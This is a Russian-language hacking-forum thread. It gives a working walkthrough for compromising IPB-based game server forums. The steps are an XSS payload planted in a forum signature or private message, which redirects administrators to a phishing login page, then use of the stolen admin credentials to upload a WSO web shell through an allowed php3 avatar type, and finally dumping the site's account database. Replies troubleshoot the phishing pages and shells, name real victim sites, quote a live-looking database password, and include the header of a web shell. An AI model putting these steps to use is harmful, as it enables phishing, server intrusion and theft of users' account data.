Это оригинальная тема, другие темы выложеные на других сайтах тупой копипаст
Данный баг долго лежал в подполье, решил выложить и выслушать ваши вопросы связанные с данным багам.
Прежде чем спрашивать прочитайте все до конца.
Для начала давайте разберемся что нам это даст?
1)Стать админом а больше ничего и ненадо)
Вообщем я нашёл способ взлома сайта а там и бд, через форум ipb с применением xss.
Что такое xss?
XSS (англ. Сross Site Sсriрting — «межсайтовый скриптинг») — тип уязвимости интерактивных информационных систем в вебе. XSS возникает, когда в генерируемые сервером страницы по какой-то причине попадают пользовательские скрипты. Специфика подобных атак заключается в том, что вместо непосредственной атаки сервера они используют уязвимый сервер в качестве средства атаки на клиента.
Иногда для термина используют сокращение «CSS», но чтобы не было путаницы с каскадными таблицами стилей, используют сокращение «XSS».Сейчас XSS составляют около 15 % всех обнаруженных уязвимостей[1]. Долгое время программисты не уделяли им должного внимания, считая их неопасными. Однако это мнение ошибочно: на странице или в [Ссылки могут видеть только зарегистрированные и активированные пользователи] могут быть весьма уязвимые данные (например, идентификатор сессии администратора). На популярном сайте скрипт может устроить DoS-атакy.
Работает везде где имееться тег acronym в ipb
Пример популярных серверов: [Ссылки могут видеть только зарегистрированные и активированные пользователи] (уже не актуально)
XSS работал бы и на шоках но там слишком длиные сообщения запрещены(в подписи) а в сообщение эти теги отключены.
Создаем фейк.
Для начала нам нужно скачать ArxWFakeGen ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) (Зеркало:[Ссылки могут видеть только зарегистрированные и активированные пользователи] спасибо rea1 ([Ссылки могут видеть только зарегистрированные и активированные пользователи])) (Антивирус скажет что там вирус, но не пугайтесь это hactool)
Распаковываем, запускаем:
1)В поле страница пишем путь к странице авторизации форума. Пример: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
2) В поле переадресация делаем на главную. Пример: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
3)Где тип базы выберите "Своя" и вместо base3124.dat пишим pass.txt (ну или другое название типа password.txt key.txt lol.txt и т.д.)
4)В поле тип главной выберите htm
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
Очень часто прога создает ошибки в фейке и у вас не отображаются картинки, для этого открываем index.htm текстовым файлом ищем строчки:
<style type="text/css" media="all">
@import url([Ссылки могут видеть только зарегистрированные и активированные пользователи]);
</style>
И убираем лишний адрес
В итоге должно получиться так:
<style type="text/css" media="all">
@import url([Ссылки могут видеть только зарегистрированные и активированные пользователи]);
</style>
Сохраняем и фейк готов!
Фейк мы приготовили. Пример: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Теперь нам нужно приготовть xss.
Код xss выглядит таким образом:
1) Для ie & firefox
Пример с оперой [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Вместо [Ссылки могут видеть только зарегистрированные и активированные пользователи] вам нужно вставить свою ссылку на фейк. И у вас должно получиться что то вроде этого:
][/acronym]
Чтобы небыло видно лучше всего скрыть цветом.
Код мы приготовили теперь нужно его вставить в подпись, для этого идем в кабинет, переходим в подпись и вставляем код.
Теперь нужно поймать админа, для этого пишем ему в ЛС что либо про донат и т.д. и т.п.
Код работает таким образом. Когда админ переходит на ваше лс (личное сообщение) открывается ваш фейк с адресом форума (Оо). То есть админ не впалит вас что это фейк а подумает что нить про куки и т.п.
Когда же админ зайдет снова в ваше ЛС фейк больше НЕ ОТКРОЕТЬСЯ ^^, при переходе на фейк он получит куки в виде ibp_my=1234 и пока есть этот кук переадресовывать на фейк не будет. Но как же сделать чтобы куки стерались через 24 часа?
setTime(getTime()+30*24*60*60*1000)
Красным выделено количество дней, в течение которых кука будет храниться в браузере юзера.(Вам нужно изменить это в коде)
Вот админ прочитал наш лс мы получили его пасс. Что делать дальше?А дальше мы идем в админку [Ссылки могут видеть только зарегистрированные и активированные пользователи]ваш_форум/admin/
Есть несколько способов залить шелл:
1) Через аватар
2) Через sql
3) Через настройки форума
Первый наиболее легки поэтому я вам про него расскажу.
В админке идем Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да. Топаем в свой профиль:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
грузим аву-шелл с расширением php3, смотрим адрес вашего аватара переходим по нему и получаем шелл.
Далее залазим в самый корень и ищем config файл с логин и пассом от мускула, ну а дальше подключаемся сливаем бд и т.д.
Таким образом мной было взломано очень много серверов, первой жертвой как вы уже догадались был сервер l2fan-day.ru.
Для этого в админке где bb коды тебе просто нужно отключить либо удалить тег arconym
Все вопросы только в эту тему, именно для этого я её создал! В icq не писать, всё равно не отвечу.
Удачи!
Уже появились первые вопросы.
FAQ:
Вопрос: Так получается админ еще должен в фейк ввести логин пасс свой?Так он не глупый не введет.
Ответ: Адрес будет [Ссылки могут видеть только зарегистрированные и активированные пользователи]ваш форум.com/index.php?act=Msg&CODE=01 а страница фейковая, т.е. адрес не поменяется
Вопрос: Так значит название домена не повлияет?
Ответ: Не повлияет
Вопрос: чтобы и на ИЕ и на Оперу фейк переадресовывал можно в подписи оба кода вставить?
Ответ: Да
Вопрос: Почему у меня в фейке не отображаються картинки?
Ответ: Прочитай статью занова и внимательно!
Вопрос: Где смотреть пароли? or вопрос,а где будет пароль админа?
Ответ: В файле txt (pass.txt и т.д. и т.п.)
Вопрос: Какой хостинг выбрал ты?
Ответ: [Ссылки могут видеть только зарегистрированные и активированные пользователи] но для этого вам придеться и зарегать почту на fromru.com или gmail.com, ещё хостинги: 1gb.ru, hum.ru
Вопрос: Как поменять сообщение под цвет форума?
Ответ: Используй bb код [*COLOR="цвет"][/COLOR*] (без *)
Вопрос: Создал фейк но при вводе логина и пасса выходит вот такая ошибка:
Warning: Unknown: open_basedir restriction in effect. File(/home/vov/l/2/t/l2toy/public_html/login.php) is not within the allowed path(s): (/nonexistent) in Unknown on line 0
Warning: Unknown: failed to open stream: Operation not permitted in Unknown on line 0
Fatal error: Unknown: Failed opening required '/home/vov/l/2/t/l2toy/public_html/login.php' (include_path='.:/usr/local/share/pear') in Unknown on line 0
Ответ: Меняй хостинг либо ставь права чмод 777
Вопрос: Где найти такие форумы?
Ответ: Приступай (l2top.ru)
Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ:В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251
Вопрос:Как можно небольшие белые полоски сверху и сбоку убрать
Ответ:В коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768
Вопрос:как сделать так, чтобы прокрутка (скрол) была только вертикальная?
Ответ:никак
Вопрос: Какой шелл лучше всего юзать?
Ответ: Я вам предлагаю WSO ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) после залития попросит пароль введите root
Вопрос: ты сможешь ламануть для меня ?
Ответ нет это меня до смерти надоело)
На таких скинах как [Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи] [Ссылки могут видеть только зарегистрированные и активированные пользователи] asterios и т.д. непашет
ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) везде , т.к. форум жрет этот кусок кода!
Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Пасс: zhyk.ru Спасибо пиквику)
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
На l2top.ru ты найдешь кучу таких форумов
BuT9H
03.06.2010, 11:19
создал фейк ввожу туда логин пасс потом не переадресовывает а выходит ошибка и данные не записываются в текстовик на хостинге...что делать?
xRedBullkax
03.06.2010, 12:17
как проверить что фикса нету?
я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>
Rea1
03.06.2010, 12:18
Сори за нубство)
][/acronym]
правельная подпись или я чёт нето написал?)
m0nk
03.06.2010, 12:36
как проверить что фикса нету?
я скрипт вставил,подпись изменил,и пишет типо ваша текущая подпись '>
так и должно быть, скрой это под цвет форума
Сори за нубство)
][/acronym]
правельная подпись или я чёт нето написал?)
1) ты зачем ****** поменял на * ?
2) [Ссылки могут видеть только зарегистрированные и активированные пользователи] нет такого сайта
3) Будет вот так:
][/acronym]
Добавлено через 17 минут
ПРОШУ ВНИМАНИЯ!
В коде где x3C****** поменяйте на x3Cifr*ame (без*) , т.к. форум жрет этот кусок кода!
fireridlle
03.06.2010, 14:16
программа сделал фейк не с тем оформлением.
вот оригинал [Ссылки могут видеть только зарегистрированные и активированные пользователи]
вот фейк [Ссылки могут видеть только зарегистрированные и активированные пользователи]
cavern
03.06.2010, 17:01
вот шелл wso2 [Ссылки могут видеть только зарегистрированные и активированные пользователи]
на форумах такого типа у кого-нибудь работает? [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Sorceres
03.06.2010, 18:02
Возникает такая трабла при создании фейка..
Атрибуты 777
Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин)
2 скрин что у меня в login.php
IceMix
03.06.2010, 18:06
Ребят поскажите как зделать права 777 ???
Хостинг wallst.ru
Rea1
03.06.2010, 18:07
Выдели пожалуйста строку где ставить пробел...
fireridlle
03.06.2010, 18:21
сайт la2real.net/forum
в подписе пишу
][/acronym]
ошибка
[Ссылки могут видеть только зарегистрированные и активированные пользователи]******.net/thumb/thumb_8351490c.jpg ([Ссылки могут видеть только зарегистрированные и активированные пользователи]******.net/show.php/1468227_.jpg.html)
m0nk
03.06.2010, 18:42
Возникает такая трабла при создании фейка..
Атрибуты 777
Страница ввода логина работает,а когда жмёшь войти такая вот ошибка(1 скрин)
2 скрин что у меня в login.php
меняй хостинг, валст неподходит
fireridlle
03.06.2010, 18:43
а можно сделать чтоб переход побыстрей проходил. а то я сначало смотрю свой профиль и где то через секунд 5 меня перенаправляет на мой фейк
Добавлено через 1 минуту
меняй хостинг, валст неподходит
подходит
вот у меня стоит [Ссылки могут видеть только зарегистрированные и активированные пользователи]
fireridlle
03.06.2010, 19:45
поставь права 777 на файл pass.txt(или как он у тебя называется).
дай сылку на фейк. лог и пас от админки. посмотрю что у тебя там
towner
03.06.2010, 19:53
Кста, не обязательно писать в личку админу, достаточно оставить сообщение в теме, в которую админ заходит, и когда он её откроет его перекинет на фейк.Лично я оставил пост в новостях :)
m0nk
03.06.2010, 20:11
Об этом я знаю, кстати если в подписе нельзя вставить код то можно вставить в сообщение (ЛС)
samyrai5
03.06.2010, 20:14
вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?
[Tiger]
03.06.2010, 20:20
вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?
он должен его ввести туда=))
m0nk
03.06.2010, 20:35
вот а есле я сделал фейк а админ неперейдет по немогу тогда я пас некак неузнаю?
ты кидаешь ему лс, он заходит в него и его автоматичекски кидает на фейк, адрес остаеться такой же но страница фейковая
pickwick
03.06.2010, 21:46
Видео по созданию фейка.
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Пасс: zhyk.ru
автор monk
MAXIMICH
04.06.2010, 00:19
А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)
Excellent18rus
04.06.2010, 00:36
+время убирайте,т.к оно на месте остается...
m0nk
04.06.2010, 06:15
я то не против насчет темки, но все таки задумался...
Жук говорил, что он против того чтобы на ЖУКЕ (для этого есть дарквеб - проект жука №2) выкладывали всевозможные уязвимости форумов или взломов. Так как это не баг игры, а баг конкретного движка. Т.Е. КАК можно быть против выкладывания сплоитов и всевозможных багов форумов или просто сайтов и в это время самому контролировать чтобы их все таки выкладывали?)
кто не понял - пропустите мимо ушей! еще раз говорю, тема стоящая, НО это не относится к ла2, разве только что БД слить, и то это можно отнести не только к БД ла2, а к другой БД.
Я просто про то говорю, что либо выкладывать и ничего не говорить, либо не выкладывать вообще и тогда можно говорить что форум не относится к взломам других сайтов или форумов.
кто прочитал - молодец! и он потратил минуту своей жизни на лабуду :D
Жук, скартезе и т.д. говорили мне выложить лучше на ДВ. Но думаешь там бы его заметили? Он бы остался незамеченным, как иголка в стоге сена.
А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)
в коде вместо x20width=100%\x20height=100% вставь x20width=1024\x20height=768 белых полосок должно быть невидно
и попробуй вместо x20scrolling=no на x20scrolling=yes
Fix
04.06.2010, 06:39
А кто знает как сделать так, чтобы прокрутка (скрол) была только вертикальная? ато некоторые форумы не влазят, а горизонтальная прокрутка палит сильно) И еще как можно небольшие белые полоски сверху и сбоку убрать, потому как если дизайн форума не белый, то тоже немного палится)
В скролле пишеш=no - горизонтальный скролл.
какие такие полоски ?
MAXIMICH
04.06.2010, 10:18
В первом скролле пишеш =yes - вертикальный скролл;
Во втором - горизонтальный скролл.
Так в коде только 1 скролл x20scrolling )
SnOoPKa
04.06.2010, 10:56
Проделываю все как показанно в видео уроке, но при вставке кода XSS в пдпись... в подписи нечего не высвечивается :( что делать? Подскажите плиз! Значит у меня на форуме такое не работает ?
m0nk
04.06.2010, 11:00
ссылка на форум кинь
SnOoPKa
04.06.2010, 11:06
[Ссылки могут видеть только зарегистрированные и активированные пользователи] Получается вот так [Ссылки могут видеть только зарегистрированные и активированные пользователи]
При виде вот такого окошечка для вxода и регистрации, можете быть уверенными там работать не будет, т.к. это новая версия ipb и тег акроним там отключен.
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
towner
04.06.2010, 11:56
Эм, у меня такая трабла - на фейк перекидывает только если навести курсор на подпись, с чем может быть связано? :noemotion:
m0nk
04.06.2010, 12:08
то что для ие (первый) так и работает, фейк открываеться при наведении курсора.
Fix
04.06.2010, 12:15
Ставьте стандартный скин, увидите подходит под эту тему или нет.
SnOoPKa
04.06.2010, 14:14
Появился значек '> но не перекидывает на фейк.Не перекидывало и по вашей тест ссылке (Просто открывался пользователь) пока она не стала недоступной! Косяк оперы ? Vot kod ][/acronym]
Пишется <acronym title= При наведении на '>
Excellent18rus
04.06.2010, 14:48
первый код перекидывает автоматом, но не на всех браузерах... на новых версиях он уже не пашет...
зато 2ой код пашет везде, НО чтобы он сработал, надо чтобы по нему провели курсором... балуйтесь...
место кода всегда будет '>
ничего страшного...
SnOoPKa
04.06.2010, 15:02
первый код перекидывает автоматом, но не на всех браузерах...
Этот первый код написанно что только для FireFox & IE
2ой код пашет везде, НО чтобы он сработал, надо чтобы по нему провели курсором...
у меня стоит Opera и я вставил второй код, но он не перекидывает!Даже если по нему проводить курсором или нажимать на него... Что можно сделать в таком случае? у меня код правильно вообще записан? Выше постом... :sceptic:
infernale
04.06.2010, 15:14
у меня стоит Opera и я вставил второй код, но он не перекидывает!Даже если по нему проводить курсором или нажимать на него... Что можно сделать в таком случае? у меня код правильно вообще записан? Выше постом... :sceptic:
Возможно у тебя уже есть куки
Excellent18rus
04.06.2010, 15:27
так. наоборот :)
1ый по наведению
2ой автоматом - на последних версиях браузера не пашет...
SnOoPKa
04.06.2010, 15:48
Возможно у тебя уже есть куки
нет куков у меня нету
так. наоборот :)
1ый по наведению
2ой автоматом - на последних версиях браузера не пашет...
Opera Версия 9.52 уже не новая далеко... Ради проверки установил Oper'y Версия 5... всеравно не кидает на фейк :(
m0nk
04.06.2010, 16:09
Залил шелл, админки нету, из этого что-то можно выжать?
Непонял вопроса,какой админки?
BlackWinG
04.06.2010, 16:18
Он имеет ввиду, что там я так понял одни акки только персов, админов акка нету? Так я понял?
Helko
04.06.2010, 16:23
Он имеет ввиду, что там я так понял одни акки только персов, админов акка нету? Так я понял?
он иммет ввиду что он просто через аву шелл залил а не через админа
sunches
04.06.2010, 16:33
Можно просто создать темку на форуме и любой вошедший будет перенапрвлен на фейк,я так понял,что можно и не только от админа получить пароль и логин)
Helko
04.06.2010, 16:35
Можно просто создать темку на форуме и любой вошедший будет перенапрвлен на фейк,я так понял,что можно и не только от админа полчить пароль и логин)
ну да от любого кто зайдет и введет данные, просто от остальных особого толка не будет:)
samyrai5
04.06.2010, 17:04
как поставить права 777 подскажи а?
sunches
04.06.2010, 17:32
через Total Commander можно выставить права просто потконектится к фтп чере TC выбрать файл куда сохраняются пасы т.е. pass.txt или что у вас там в коммандере Файл--->Изменить атрибуты ну и вводите 777
вссе делаю как надо * убрал сделал норм но после как нажимаю Обновить подпись уменя не кидает на фейк(
потому что ты уже получил кукесы
DarkRider
04.06.2010, 21:16
всё делал как написано в текстовые файлы пришли акк и пас но они неподходят делал ещо раз приходило тоже самое чо это может быть?
Fix
05.06.2010, 06:57
Моя опера меня не подводит(
перехожу только с IE
Chipito
05.06.2010, 14:46
Моя опера меня не подводит(
перехожу только с IE
Попробуй скачать opera portable и через нее глянуть подпись,обычно опера не делает переход из за куков.
Люди вот так делать ненужно, во 1) Его уже взломали Во 2) Вы бы хотябы скрыли под цвет и в 3) спалитесь быстро
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
BlackWinG
05.06.2010, 19:01
Тоесть грубо говоря если у админа Оперы и не почищены куки, то не сработает?
Chipito
05.06.2010, 19:19
Тоесть грубо говоря если у админа Оперы и не почищены куки, то не сработает?
Если его перемещало по такой ссылке\подписи,то да,работать не будет.
m0nk
06.06.2010, 11:11
шелл [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Как залить:
В админке:
Форумы->Прикрепляемые файлы->Типы файлов
жмем "Добавить новый тип"->"Использовать какой-нибудь тип как базовый?" - выбираем "Основан на типе php"->"Расширение прикрепляемого файла" - php3 (просто php есть в списке по умолчанию и при загрузке автоматически переименовывается в .txt)->"MIME-тип файла" - unknown/unknown->"Разрешить использовать этот тип файлов, как аватар или фотографию?" - да.
Топаем в свой профиль:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
грузим аву-шелл с расширением php3 и получаем шелл по адресу:
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
Fix
06.06.2010, 12:53
логин/пароль для wso: root
fesssi
07.06.2010, 20:55
ВИдел очень много вопросов с кодом ТИПА чо у мя неправильно
Вот самый упрощеный пример:
_]_____________Я в полном ШОКЕ __________[/acronym][/color*]
acronym]
Работает безотказно проверено Еще дам подсказуку чтоб непромахнулся модератор можно вместо _____________Я в полном ШОКЕ _________ постовить код любого аватара например типа вот ТАК:
<a target="_blank" href="[Ссылки могут видеть только зарегистрированные и активированные пользователи]"><img src="[Ссылки могут видеть только зарегистрированные и активированные пользователи]" ></a>
После єтого надпись невидно но зато очень класно срабатывает наведение курсора на картинку. Адрес аватара для подписи можно взять например отсюда: [Ссылки могут видеть только зарегистрированные и активированные пользователи]
Буду рад если помог)
А совсем забыл все остальные фишки типа времени удаления и т.д и т.п. можно добавлять по желании пример самый простой для понимания...
ОТВЕТ
Если сообщение: Ваша подпись слишком длинная.
Всё ? , облом?-----------------------------------------------Я просто навел пример с картинкой, но в сравнии с добавкой на время то врятли выходит длинее.
m0nk
07.06.2010, 21:18
можно попробовать в сообщение (лс) вставить но слишком палевно
object
07.06.2010, 21:27
можно попробовать в сообщение (лс) вставить но слишком палевно
Да я хотел зделать по другому:
поставить подпись , и создать тему в флудилке до считаем до "Н" числа , клюнет много кого и будут аки ;).
Кстати созрел способ для ИЕ , точнее как заставить нужного юзера навести курсор , щяс в подполку скину :goplol:.
gladvoz
08.06.2010, 18:24
делаю фейк, заливаю на хостинг. и в место слов получается вот это
[Ссылки могут видеть только зарегистрированные и активированные пользователи] ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
fesssi
08.06.2010, 18:29
Вопрос: Программа создала фейк но там не понятна кодировка, всякие квадратики и т.д
Ответ: В программе, внизу где 'Дополнительная замена строк'
Введите в поле 'C' => charset=utf-8
Введите в поле 'На' => charset=windows-1251
В общем все просто
находим доступ в админку, заходим
Далее - Внешний Вид
тут:
Если скин IP.Board Pro то делаем так:
1. заходим в настройки этого скина смотрим в какой директории лежат изображения для этого скина. Запоминаем.
2. Импорт и экспорт стилей - Импорт... - Импорт изображений
выбираем ipb_images-ip.boardpr.xml.gz (Какой стиль использовать с импортируемой директорией? IP.Board Pro) - Импортируем
узнаем где лежит шелл, заходим в настройки скина IP.Board Pro
Директория с изображениями - ip.boardpr1228455805 (в моем случае)
Изменяем так как было изначально.
Шелл будет доступен в директории
[Ссылки могут видеть только зарегистрированные и активированные пользователи]
(С) Ачат c0m
Вот сами два файла:
[Ссылки могут видеть только зарегистрированные и активированные пользователи] (images)
[Ссылки могут видеть только зарегистрированные и активированные пользователи] (styles)
ЗЫ Отчет с вирустотала архивов не делал=) т.к. их можна даже не открывать у себя на машине.
m0nk
08.06.2010, 18:52
Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче
Chipito
08.06.2010, 18:54
Chipito если не ошибаюсь это для 3 версии, и самый сложный способ т.к. нужно качать денвер + сам движок форума устанавливать и т.д. Через аватар or sql и настройки легче
Оо какой денвер и движок?
Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=)
Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net
Me$$iah
09.06.2010, 12:56
Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?
][/acronym]
[/acronym][/acronym][/size]
][/acronym]:pandal:
m0nk
09.06.2010, 13:29
Оо какой денвер и движок?
Заходим в админку,заливаем стили,потом настройки стилей,смотрим директорию с изображениями и все=)
Да и подходит он к любой версии,вспомни видео,как сливали базу l2europe.net
Извеняюсь до конца сообщение не прочитал, просто вот эти файлы [Ссылки могут видеть только зарегистрированные и активированные пользователи] (images)
[Ссылки могут видеть только зарегистрированные и активированные пользователи] (styles) делали через денвер + движок)
Почему первый скрипт (без куки) переходит сразу на фейк при загрузке подписи с любого браузера, а скрипт с кукисами вообще не работает? В чём разница кроме сохранения кукисов?
:pandal:
Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.
LastHero
09.06.2010, 15:40
m0nk ссылка как исправить потерта,хотелось бы узнать тут или в лс
fesssi
09.06.2010, 15:41
forum.la2mega.com
у вас фейк нормально делается? потому что когда я сделал фейк,он почти голый без оформления.
Была похожая лажа форум уже непомню... Но переделал так сделал дубликат фарума на локольную тачку например прогой Телепорт)
Потом закинул файлы с картинками на хостинг где фейк лежыт ну и переделал Индекс файл что бы он читал прямо с хостинга фейка картинки)
Мне лично помогло.
Удачи)
m0nk
09.06.2010, 17:32
( Для примера я взял forum.la2mega.com)
Для начала создаем прогой ([Ссылки могут видеть только зарегистрированные и активированные пользователи]) фейк страницы [Ссылки могут видеть только зарегистрированные и активированные пользователи] как обычно.
Переименуем index.htm на feik.htm он будет вот такого содержания:
Клац ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
После чего открываем в браузере [Ссылки могут видеть только зарегистрированные и активированные пользователи] (вы должны быть не авторизованы)
Нажимаем в барузере Файл - Сохранить как, выбираем все файлы (в типе) и сохраняем на рабочем столе под именем la2.htm
Он вот такого содержания:Клац ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
Открываем блокнотом feik.htm и ищем вот такие строчки:
</div>
<form action="/login.php" method="post">
<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="" />
<input type="hidden" name="referer" value="[Ссылки могут видеть только зарегистрированные и активированные пользователи]" />
<input type="hidden" name="CookieDate" value="1" />
<h4>Сейчас вы не авторизованы. Можете сделать это, используя форму ниже.</h4>
<div class="fieldwrap">
Далее открываем la2.htm и ищем вот такие строчки:
</div>
<form action="[Ссылки могут видеть только зарегистрированные и активированные пользователи]" method="post">
<input type="hidden" name="act" value="Login" />
<input type="hidden" name="CODE" value="01" />
<input type="hidden" name="s" value="db4f03fb6c6007aca8b1ae41721a3a1e" />
<input type="hidden" name="referer" value="[Ссылки могут видеть только зарегистрированные и активированные пользователи]" />
<input type="hidden" name="CookieDate" value="1" />
<h4>Сейчас вы не авторизованы. Можете сделать это, используя форму ниже.</h4>
<div class="fieldwrap">
<h4>Пароль</h4>
<input type="password" size="20" name="PassWord" />
<p class="formbuttonrow1"><input class="button" type="submit" name="submit" value="Войти!" /></p>
</div>
и заменяем на то что вы искали выше.
Далее вам нужно указать полный путь к файлам, ищем все строчки такого типа
style_images/
jscripts/
cache/
И перед ними ставим адрес форума, в моем случае это [Ссылки могут видеть только зарегистрированные и активированные пользователи]
В итоге, сохраняем и у нас получиться что то вроде этого:
Клац ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
переименовываем la2.htm на index.htm и заливаем файлы pass.txt login.php и index.htm наш фейк готов!
Для этого идем в админку forum/admin/ далее управление слева будет столбик Прикрепляемые файлы там строка Типы файлов переходим по ней далее Добавить новый тип в Расширение прикрепляемого файла пишем: php3 (или phtml) в MIME-тип файла: unknown/unknown
Разрешить использовать этот тип файла как аватар или фотографию? выбираем да и нажимаем добавить.
Залили шелл [Ссылки могут видеть только зарегистрированные и активированные пользователи] (пароль по умолчанию root) переходим в самый корень папки (нажимайте [ .. ] ) пока не увидите папку inc далее переходите выбираете [ data ] далее где config_db.php переходим, видим что то вроде этого:
<?php
/**
* STRESS WEB
* @author Alexandr Yuschenko (S.T.R.E.S.S.)
* @copyright 2008 - 2009 STRESS WEB
* @version 8.0
* @web [Ссылки могут видеть только зарегистрированные и активированные пользователи]
*/
if (!defined('STRESSWEB')) die ('Hacking!!!');
define("DBHOST","localhost");
define("DBUSER","root");
define("DBPASS","sslimruless");
define("DBNAME","l2jdb2");
define("COLLATE","cp1251");
define("SERIAL","");
?>
где Host пишем localhost где Login пишем root где Password пишем sslimruless и нажимаем >> или enter.
Далее нажимаем на список где Database
и выбираем l2jdb2 (можно и другие посмотреть)
и нажимаем снова >> или ентер
Далее видим список
access_levels
account_data
accounts
admin_command_access_rights
admin_login_logs
admin_logs
admin_permission_rows
announcements
api_log
api_users
armor
armorsets
attachments
attachments_type
auction .......
нам нужна папка accounts слева ставим галочку внизу нажимаем dump
В итоге качаем бд по ссылке forum/uploads/dump.sql
Как сделать себя админом расскажет вам Chipito =)
Но лучше не палиться а настроить апач, админка в хакерском варианте(управление через сайт только для ИТ), Скачать ([Ссылки могут видеть только зарегистрированные и активированные пользователи])
P.S. некоторые админы ставят у себя на компе серв, вы можете скачать сам серв, дял этого смотрим сюда
Drives:[ c ] [ d ] [ e ] [ f ] [ g ]
сверху, и лазием по дискам и ищем папку сервака)
P.S.S За шелл спасибо Relikt'у
m0nk
09.06.2010, 19:45
Измени кодировку в блокноте, и поясни свой вопрос нормально)
p.Number0ne
09.06.2010, 19:55
На компе норм открывается индекс а на компе а кода залил нефига
Добавлено через 6 минут
В блакноте не могу найти как изменить кодировку (((
Me$$iah
09.06.2010, 20:24
Скрипт с куками работает, тебя переадресовывает один раз, при следующем разе не переадресует т.к. записалась кука ipb=1234 и пока ты куки не почистишь тебя переадресовывать не будет, это сделано для того чтоб не палиться. Как админ сможет прочитать твое лс если его будет перекидывать на фейк все время, он впалит сразу.
Это я понимаю. Я наверно не правильно выразился. Я имел ввиду то, что у меня ни в одном браузере не работает скрипт с автопереадресацией с куками (Когда переадресация идёт без участия мышки).
fireridlle
09.06.2010, 20:52
почисть куки и переадресует или если ты искользовал первый скрипт то наведи мышку на подпись
BlackWinG
10.06.2010, 00:01
Просто МБ на том ФОруме Фикс и там просто не пашет
m0nk
10.06.2010, 06:35
Это я понимаю. Я наверно не правильно выразился. Я имел ввиду то, что у меня ни в одном браузере не работает скрипт с автопереадресацией с куками (Когда переадресация идёт без участия мышки).
Это нормальное явление, значит у тебя новый браузер, а скрипт с автоматической переадресацие не пашет на новых, но не факт что он не будет работать у админа.
p.Number0ne
10.06.2010, 12:38
Дорогой "Монк" у меня вопрос !!!
Итак в проге всё прописываю получаю Index.html и ещё 2 файла login.php 1.txt после этого заливаю на сайт а в сайте какие-та не понятные ироглифы на компе открывается норм index.html а на моём сайте это фигня !!!Пожалуйста объясни мне как убрать ошибку ...
m0nk
10.06.2010, 12:55
Открываешь index.htm блокнотом, выбираешь файл --> сохранить как , выбираешь кодировку (ANSI, UTF-8, Юникод, пробуй разные я точно не помню) где имя файла пишешь index.htm и сохраняешь
MrXF
10.06.2010, 14:00
5) Нажимаем создать, выбираем 2 поля UserName и PassWord, нажимаем продолжить, закрываем, видим 3 файла в корне программы ( login.php, index.htm, pass.txt) все их нужно залить на фтп. (Для этого вам нужен хостинг. список хостингов можно посмотреть здесь
всё зделал тыкаю сылку "здесь" вылазит , IP менял
Вы были заблокированы по следующей причине:
Причина не указана.
Дата снятия блокировки: Никогда
BlackWinG
10.06.2010, 17:58
Бери другой хостинг просто h1.ru
Me$$iah
11.06.2010, 15:21
Загрузил шелл захожу по нему: Ответ:
<?php # Web Shell by oRb
$auth_pass = "63a9f0ea7bb98050796b649e85481845";
$color = "#df5";
$default_action = 'FilesMan';
$default_use_ajax = true;
$default_charset = 'Windows-1251';
